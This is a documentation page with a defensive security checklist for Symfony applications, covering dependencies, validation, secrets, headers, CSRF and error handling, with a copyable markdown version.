Skip to Content
BackendSecuritySecurity checklist (Symfony)

Security checklist (Symfony)

Refs :

This checklist is a collection of security best practices for Symfony applications. It covers a wide range of topics :

  • Dependency management
  • Data validation
  • Environment variables
  • Data exposure
  • Security headers
  • Server-side security
  • Centralized security functions
  • Data handling
  • Development and Security tools
  • Self-hosted deployments
  • Content Security Policy
  • Search parameters and user inputs
  • Cross-Site Scripting (XSS) protection
  • Cross-Site Request Forgery (CSRF) protection
  • Error handling

By following these guidelines, you can enhance the security of your Symfony projects and protect them from common vulnerabilities.

1. Keep Dependencies Updated

  • A. Regularly update all dependencies to their latest versions.
  • B. Use tools like Dependabot , composer outdated, or composer audit to automate updates and check for vulnerabilities.
  • B. Use tools like composer recipes, to automate updates bundles configurations.
  • C. Identify and remove unused or outdated dependencies to improve security and performance composer-unused .
  • D. Commit composer.lock and symfony.lock to maintain consistent versions across environments.

2. Validate and Sanitize Data

  • A. Never trust user input; always validate and sanitize data from users and external APIs.
  • B. Use ValueObject validation using Symfony Validation.
  • C. Ensure validation covers all input cases, including edge cases.
  • D. Verify error messages provide clear feedback while preventing sensitive data leaks.
  • E. Use libraries like Symfony HTML Sanitizer  for HTML content and schema validation for form inputs.

3. Secure Environment Variables

  • A. Store sensitive information like API keys and database credentials in environment variables.
  • B. Use tools to scan for accidental exposure of secrets in your codebase.
  • C. Ensure environment variables are not exposed to the client-side.
  • D. Ensure private environment variables aren’t pushed in repo but as secrets

4. Prevent Accidental Data Exposure

  • A. Ensure server-side logic and sensitive code are never exposed to the client.
  • B. Avoid transferring custom classes or non-serializable data structures.
  • C. Regularly audit your API responses and Network tab to prevent unintentional leaks.

5. Implement Security Headers

  • A. Use HTTP security headers like Content-Security-Policy, Strict-Transport-Security, and X-Frame-Options.
  • B. Use NelmioSecurityBundle  to configure them in Symfony.
  • C. Review and update your security headers regularly.

6. Secure Server Actions & APIs

  • A. Validate and sanitize all incoming data for Server Actions and API endpoints.
  • B. Implement rate limiting and bot protection to prevent abuse.
  • C. Ensure Server Actions are invoked exclusively via the POST method.
  • D. Consider security tools like Arcjet  for additional protection.

7. Centralize Security Functions

  • A. Consolidate authentication and authorization logic into a central security module.
  • B. Ensure KVS (Key-Value Store) is centralized for security and maintainability.
  • C. Promote code reuse and simplify maintenance by enforcing a single source of truth.

8. Improve Error Handling

  • A. Use structured error handling with try-catch blocks and logging.
  • B. Review API error messages and ensure they are user-friendly while preventing data leaks.
  • C. Avoid exposing stack traces or internal server information.

9. Leverage Development & Security Tools

  • A. Use editor and IDE plugins to detect security vulnerabilities during development.
  • B. Incorporate linters, static analysis tools, and security scanners into your CI/CD workflow.
  • C. Stay informed about the latest security tools and integrate them as needed.

10. Cross-Site Request Forgery (CSRF) Protection

  • A. Ensure CSRF tokens are used in API requests requiring authentication.
  • B. If using session-based authentication, implement SameSite cookies for additional protection.
  • C. Configure allowedOrigins in Symfony to fully safeguard against CSRF attacks.

Code

You can copy paste this code in a file in the root of your project to keep track of the security checklist.

  • Filename : SECURITY_CHECKLIST.md
  • Header of the file :
Last verification : YYYY-MM-DD
By : Name
  • Code :

Show Code (Md)

# Security checklist
 
Ref : https://blog.arcjet.com/next-js-security-checklist/
Ref : https://nextjs.org/blog/security-nextjs-server-components-actions
Ref : https://github.com/PHPCreation/phpreaction-frontend-crud-react-v2/issues/256
 
## **1. Keep Dependencies Updated**
 
- [ ] A. Regularly update all dependencies to their latest versions.
- [ ] B. Use tools like [Dependabot](https://docs.github.com/en/code-security/dependabot), `composer outdated`, or `composer audit` to automate updates and check for vulnerabilities.
- [ ] B. Use tools like `composer recipes`, to automate updates bundles configurations.
- [ ] C. Identify and remove unused or outdated dependencies to improve security and performance [composer-unused](https://github.com/composer-unused/composer-unused).
- [ ] D. Commit `composer.lock` and `symfony.lock` to maintain consistent versions across environments.
 
## **2. Validate and Sanitize Data**
 
- [ ] A. Never trust user input; always validate and sanitize data from users and external APIs.
- [ ] B. Use ValueObject validation using Symfony Validation.
- [ ] C. Ensure validation covers all input cases, including edge cases.
- [ ] D. Verify error messages provide clear feedback while preventing sensitive data leaks.
- [ ] E. Use libraries like Symfony [HTML Sanitizer](https://symfony.com/doc/current/html_sanitizer.html) for HTML content and schema validation for form inputs.
 
## **3. Secure Environment Variables**
 
- [ ] A. Store sensitive information like API keys and database credentials in environment variables.
- [ ] B. Use tools to scan for accidental exposure of secrets in your codebase.
- [ ] C. Ensure environment variables are not exposed to the client-side.
- [ ] D. Ensure private environment variables aren't pushed in repo but as secrets
 
## **4. Prevent Accidental Data Exposure**
 
- [ ] A. Ensure server-side logic and sensitive code are never exposed to the client.
- [ ] B. Avoid transferring custom classes or non-serializable data structures.
- [ ] C. Regularly audit your API responses and **Network tab** to prevent unintentional leaks.
 
## **5. Implement Security Headers**
 
- [ ] A. Use HTTP security headers like `Content-Security-Policy`, `Strict-Transport-Security`, and `X-Frame-Options`.
- [ ] B. Use [NelmioSecurityBundle](https://symfony.com/bundles/NelmioSecurityBundle/current/index.html) to configure them in Symfony.
- [ ] C. Review and update your security headers regularly.
 
## **6. Secure Server Actions & APIs**
 
- [ ] A. Validate and sanitize all incoming data for **Server Actions** and API endpoints.
- [ ] B. Implement rate limiting and bot protection to prevent abuse.
- [ ] C. Ensure Server Actions are invoked exclusively via the **POST** method.
- [ ] D. Consider security tools like [Arcjet](https://arcjet.com/) for additional protection.
 
## **7. Centralize Security Functions**
 
- [ ] A. Consolidate authentication and authorization logic into a **central security module**.
- [ ] B. Ensure **KVS (Key-Value Store) is centralized** for security and maintainability.
- [ ] C. Promote code reuse and simplify maintenance by enforcing a single source of truth.
 
## **8. Improve Error Handling**
 
- [ ] A. Use structured error handling with **try-catch blocks and logging**.
- [ ] B. Review API error messages and ensure they are **user-friendly** while preventing data leaks.
- [ ] C. Avoid exposing stack traces or internal server information.
 
## **9. Leverage Development & Security Tools**
 
- [ ] A. Use editor and IDE plugins to detect security vulnerabilities during development.
- [ ] B. Incorporate **linters, static analysis tools, and security scanners** into your CI/CD workflow.
- [ ] C. Stay informed about the latest security tools and integrate them as needed.
 
## **10. Cross-Site Request Forgery (CSRF) Protection**
 
- [ ] A. Ensure **CSRF tokens** are used in API requests requiring authentication.
- [ ] B. If using session-based authentication, implement **SameSite cookies** for additional protection.
- [ ] C. Configure `allowedOrigins` in Symfony to fully safeguard against CSRF attacks.
Last updated on
Qr GenerationTITLE